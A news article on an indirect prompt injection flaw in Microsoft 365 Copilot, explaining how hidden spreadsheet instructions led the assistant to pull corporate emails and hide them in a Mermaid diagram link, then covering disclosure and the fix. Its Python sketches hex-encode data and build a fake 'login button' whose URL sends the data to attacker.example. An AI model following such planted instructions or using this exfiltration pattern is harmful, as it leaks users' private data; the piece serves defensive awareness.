Copilot Flaw Allows Attackers to Steal Microsoft 365 Tenant Data

A sophisticated vulnerability in Microsoft 365 Copilot (M365 Copilot) allows attackers to steal sensitive tenant data, including recent corporate emails, via an indirect prompt injection attack. The flaw, discovered by researcher Adam Logue, exploits the AI assistant's integration with Office documents and its built-in support for Mermaid diagrams.

How the Data Exfiltration Attack Works 

The attack is initiated when a user asks M365 Copilot to summarize a specifically crafted Excel spreadsheet. Hidden instructions, embedded in white text across multiple sheets, use progressive task modification and nested commands to silently redirect the AI’s behavior. 

These indirect prompts override the original summarization request. Instead, they force Copilot to use its internal search_enterprise_emails tool to retrieve recent corporate emails. The captured email content is then hex-encoded and fragmented into short lines to bypass the character limits of the diagram tool. 
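The encode-and-fragment step described above can be sketched in Python. This is an illustrative reconstruction, not Logue's actual payload; the 30-character chunk length is an assumption, since the article does not state the exact fragment size:

```python
def encode_for_exfil(text: str, chunk_len: int = 30) -> list[str]:
    """Hex-encode text and split it into short fixed-length lines,
    mimicking how the payload sidesteps per-line character limits."""
    hex_blob = text.encode("utf-8").hex()
    return [hex_blob[i:i + chunk_len] for i in range(0, len(hex_blob), chunk_len)]

def decode_fragments(fragments: list[str]) -> str:
    """Reassemble and decode the fragments (what an attacker would do server-side)."""
    return bytes.fromhex("".join(fragments)).decode("utf-8")

# Round trip: a (fictional) email snippet survives encoding and fragmentation.
fragments = encode_for_exfil("Subject: Q3 earnings draft")
assert decode_fragments(fragments) == "Subject: Q3 earnings draft"
```

The point of the fragmentation is that no single line exceeds the renderer's limit, while concatenating the fragments restores the full stolen content.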

Copilot then renders the payload as a Mermaid diagram (Mermaid is a JavaScript-based tool for creating flowcharts and other diagrams). The final output is an innocent-looking diagram that masquerades as a "login button," complete with a lock emoji and CSS styling. Crucially, this button's hyperlink embeds the entirety of the stolen, encoded email data, allowing the attacker to exfiltrate the information without requiring direct user interaction beyond the initial prompt.
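A minimal sketch of what such a disguised diagram might look like, generated in Python. The node label, styling, and attacker URL are illustrative assumptions; Mermaid's real `click` directive attaches a hyperlink to a node, which is where the encoded data rides along:

```python
def build_mermaid_exfil(encoded_fragments: list[str],
                        attacker_url: str = "https://attacker.example/collect") -> str:
    """Build a Mermaid flowchart whose lone node mimics a login button
    and whose click-through URL carries the hex-encoded data."""
    payload = "".join(encoded_fragments)
    lines = [
        "graph TD",
        '    btn["🔒 Login to view document"]',
        f'    click btn "{attacker_url}?d={payload}"',
        "    style btn fill:#2b6cb0,color:#fff",
    ]
    return "\n".join(lines)
```

Because the diagram renders as a single styled button, the lengthy hex string stays out of sight in the hyperlink target rather than appearing in the visible summary.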

Disclosure and Mitigation 

Researcher Adam Logue reported the vulnerability to the Microsoft Security Response Center (MSRC) in August 2025 following discussions at DEFCON. MSRC confirmed the vulnerability in September and released a fix by September 26. However, M365 Copilot fell outside the scope of the bug bounty program, so no reward was issued. 

This incident underscores the serious risks inherent in integrating large language models like Copilot with enterprise environments that handle sensitive data. As AI tools connect to APIs and internal resources, developers and organizations must prioritize defenses against indirect injection techniques. Microsoft has emphasized its ongoing mitigation efforts, but security experts continue to urge users to verify the source of all documents and monitor AI outputs closely. 

